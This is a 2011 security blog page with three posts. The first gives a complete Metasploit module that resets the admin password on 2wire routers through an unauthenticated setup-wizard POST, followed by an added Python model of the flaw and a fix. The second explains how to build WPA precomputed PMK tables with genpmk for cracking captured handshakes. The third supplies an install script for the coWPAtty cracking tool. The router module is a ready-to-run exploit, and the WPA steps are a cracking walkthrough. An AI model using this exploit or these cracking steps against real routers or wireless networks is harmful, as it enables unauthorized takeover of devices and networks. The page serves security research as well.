Wednesday, June 22, 2011

Metasploit module to reset admin password on 2wire wireless routers.

UPDATE: This module is now part of Metasploit. Just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see here.

Here is a Metasploit module I coded to reset the password on a 2wire router. It uses a setup wizard page that neither verifies that the user is authenticated nor removes itself after first-time setup, which can be exploited to reset the password. Without further delay, here is the code.

On my Ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb

=====================================================
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'        => '2Wire Password Reset',
      'Version'     => '$Revision: 1 $',
      'Description' => %Q{
        This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard
        page that fails to check if a user is authenticated and doesn't remove or block after first access.
      },
      'Author'      => 'Travis Phillips',
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin'])
      ], self.class)
  end

  def run
    print_status("Attempting to reset password to #{datastore['PASSWORD']} on #{rhost}\n")

    # Submit the setup wizard's password form (page H04_POST) directly to /xslt.
    # The new password is sent as-is; a value containing '&' or '=' would need URL encoding.
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri'    => '/xslt',
        'data'   => 'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] + '&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=',
      }, 25)

    # send_request_cgi returns nil on a connection failure or timeout, so guard before reading the code
    if res && res.code == 200
      if res.headers['Set-Cookie']
        print_status("Password reset successful!\n")
      end
    end
  end
end
=====================================================
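To make the root cause concrete from the defender's side, here is an added Python example (not the router's firmware and not part of the original post) that models the wizard handler twice: once with the two missing checks the post describes, and once with them in place. RouterState, wizard_post_vulnerable and wizard_post_hardened are names I made up; the form body is the one the module above sends.

```python
from dataclasses import dataclass, field
from urllib.parse import parse_qs


@dataclass
class RouterState:
    """Hypothetical model of the router's persistent state (constructed for this example)."""
    admin_password: str = "factory-default"
    setup_complete: bool = False                 # has the first-time wizard been run?
    sessions: set = field(default_factory=set)  # cookie values of logged-in admins


def parse_wizard_form(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body such as the module's POST data."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def wizard_post_vulnerable(state: RouterState, body: str, cookie: str = None) -> int:
    """Behaviour the post describes: H04_POST changes the admin password with no
    session check, and the wizard stays reachable forever after first-time setup."""
    form = parse_wizard_form(body)
    if form.get("PAGE") != "H04_POST":
        return 404
    if form.get("PASSWORD") != form.get("PASSWORD_CONF"):
        return 400
    state.admin_password = form["PASSWORD"]     # anyone on the LAN can do this
    return 200


def wizard_post_hardened(state: RouterState, body: str, cookie: str = None) -> int:
    """Same endpoint with the two missing controls: the wizard is closed once it has
    been completed, and after that a password change needs an authenticated session."""
    form = parse_wizard_form(body)
    if form.get("PAGE") != "H04_POST":
        return 404
    if state.setup_complete and cookie not in state.sessions:
        return 403                              # wizard is closed; log in first
    if form.get("PASSWORD") != form.get("PASSWORD_CONF"):
        return 400
    state.admin_password = form["PASSWORD"]
    state.setup_complete = True                 # first-time setup is now over
    return 200


# The exact body the Metasploit module sends with PASSWORD=admin.
MODULE_BODY = "PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=admin&PASSWORD_CONF=admin&HINT="
```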

Saturday, June 18, 2011

How to Generate Rainbow Tables for Cowpatty using genpmk to crack WPA/WPA2

Over the past few days I've had people ask me how to generate rainbow tables for Cowpatty. It's quite simple. Just a few things you should know first:

- Each table is for ONE ESSID. In WPA/WPA2, the SSID of the network is used as the salt when the key is derived from the passphrase.

- You will want to find a good password dictionary file. I recommend the Renderlab Church of WiFi password list found here.

- Passwords MUST be over 8 characters in length, so if you have a password list, weed out any shorter passwords.

And on with the show. Let's first look at the help screen.

genpmk 1.1 - WPA-PSK precomputation attack.
genpmk: Must specify a dictionary file with -f
Usage: genpmk [options]

-f Dictionary file
-d Output hash file
-s Network SSID
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

After precomputing the hash file, run cowpatty with the -d argument.

So, to generate a rainbow table we need to provide a dictionary, an SSID, and an output file to write the hashes to. Using the above, we can do the following:

genpmk -f final-wordlist.txt -s HackMe -d HackMe

This creates a rainbow table called "HackMe" containing the hashes of all the passwords in the file "final-wordlist.txt", salted with the SSID "HackMe". The shell output updates as every 1,000 hashes are created.

The whole process isn't all that bad time-wise, and the file size of a rainbow table built from the password file I suggest is ~40 MB. Not too bad considering the speed boost it gives when you go to crack the handshake.
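To show what genpmk actually precomputes and why a table is tied to one SSID, here is an added Python example (my code, not genpmk's or coWPAtty's) that derives the WPA PMK with PBKDF2-HMAC-SHA1 for a small constructed wordlist, filtering out entries that can never be a valid passphrase (WPA passphrases are 8 to 63 characters). The function names are my own; the "password"/"IEEE" pair is the IEEE 802.11i test vector.

```python
import hashlib

# Valid WPA/WPA2 passphrase length per IEEE 802.11i.
MIN_LEN, MAX_LEN = 8, 63


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    This is the per-word computation genpmk does once and stores in its -d file."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def filter_wordlist(words):
    """The 'weed out shorter passwords' step: keep only candidates of a valid
    length, in order, without duplicates. Accepts lines with trailing newlines."""
    seen, kept = set(), []
    for w in words:
        w = w.rstrip("\r\n")
        if MIN_LEN <= len(w) <= MAX_LEN and w not in seen:
            seen.add(w)
            kept.append(w)
    return kept


def build_table(words, ssid: str) -> dict:
    """Map passphrase -> PMK hex for ONE SSID. genpmk's output is a plain
    precomputed lookup table of exactly these pairs (not a true rainbow table)."""
    return {w: derive_pmk(w, ssid).hex() for w in filter_wordlist(words)}


def lookup(table: dict, pmk_hex: str):
    """Reverse lookup a PMK; this replaces the 4096-iteration derivation per
    candidate, which is the speed-up cowpatty -d gets from a precomputed file."""
    for w, h in table.items():
        if h == pmk_hex:
            return w
    return None


if __name__ == "__main__":
    # Constructed sample wordlist: two entries are too short and get dropped.
    WORDS = ["secret", "password", "1234567", "ThisIsAPassword", "password"]
    ieee = build_table(WORDS, "IEEE")
    hackme = build_table(WORDS, "HackMe")
    print(list(ieee))                                   # ['password', 'ThisIsAPassword']
    print(ieee["password"])                             # f42c6fc5...
    print(ieee["password"] == hackme["password"])       # False: same word, other SSID, other PMK
```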

Patch, Compile, and Install coWPAtty 4.6 on Ubuntu

Cowpatty is a great tool for cracking WPA/WPA2 keys via either a dictionary attack or via rainbow tables. All it needs is a capture of a client connecting to the network (this is called a "handshake"). However, cowpatty isn't perfect and has a bug that makes it read some handshakes incorrectly. After looking into this I found a way to install it with the patch applied on my Ubuntu box.

First we need to install the required packages. If you already have them you can skip this step.

sudo apt-get install build-essential
sudo apt-get install libssl-dev
sudo apt-get install libpcap0.8-dev
sudo apt-get install libdigest-hmac-perl

Next, download cowpatty 4.6:

wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
md5sum cowpatty-4.6.tgz

You should get b90fd36ad987c99e7cc1d2a05a565cbd as the MD5 sum. If so, extract it and move into the directory using the following:

tar -xvf cowpatty-4.6.tgz
cd cowpatty-4.6

Next we need to download the patch and apply it to the source code:

wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch
patch < cowpatty-4.6-fixup16.patch

Next we will compile it, install it, and then test it:

make
sudo make install
cd ..
cowpatty

If all goes well you should see the cowpatty help menu:

cowpatty 4.6 - WPA-PSK dictionary attack.
cowpatty: Must supply a pcap file with -r

Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

Now, if you're as lazy as me, here's everything together as a script:

#!/bin/bash
# Installs build dependencies, downloads cowpatty 4.6, applies the fixup16 patch,
# builds, installs, and cleans up. Uses ANSI colour codes for the status lines.
echo -e "\n \e[1;31m[*] Installing build-essential\e[0m"
sudo apt-get -y install build-essential
echo -e "\n \e[1;34m[*] Installing libssl-dev\e[0m"
sudo apt-get -y install libssl-dev
echo -e "\n \e[1;34m[*] Installing libpcap0.8-dev\e[0m"
sudo apt-get -y install libpcap0.8-dev
echo -e "\n \e[1;34m[*] Installing libdigest-hmac-perl\e[0m"
sudo apt-get -y install libdigest-hmac-perl
echo -e "\n \e[1;34m[*] Downloading cowpatty-4.6.tgz\e[0m"
wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
md5sum cowpatty-4.6.tgz
echo -e "\e[1;34mMD5 SHOULD BE b90fd36ad987c99e7cc1d2a05a565cbd\e[0m"
echo -e "\n \e[1;34m[*] Extracting cowpatty-4.6.tgz\e[0m"
tar -xvf cowpatty-4.6.tgz > /dev/null
cd cowpatty-4.6 > /dev/null
echo -e "\n \e[1;34m[*] Downloading Cowpatty Patch\e[0m"
wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch
echo -e "\n \e[1;34m[*] Patching Cowpatty code\e[0m"
patch < cowpatty-4.6-fixup16.patch
echo -e "\n \e[1;34m[*] Compiling Cowpatty\e[0m"
make
echo -e "\n \e[1;34m[*] Installing cowpatty to system\e[0m"
sudo make install
echo -e "\n \e[1;34m[*] Removing Cowpatty Directory\e[0m"
cd .. > /dev/null
rm -r -f cowpatty-4.6 > /dev/null
echo -e "\n \e[1;34m[*] Removing cowpatty-4.6.tgz\e[0m"
rm cowpatty-4.6.tgz > /dev/null
echo -e "\n \e[1;34m[*] Testing to see if cowpatty works\e[0m"
cowpatty
echo -e "\n \e[1;34m[*] Done!\e[0m"


Links:

http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz - Get coWPAtty here
http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch - Patch to fix several issues with cowpatty
http://www.renderlab.net/projects/WPA-tables/ - A place to get 33GB of Rainbow tables for free download.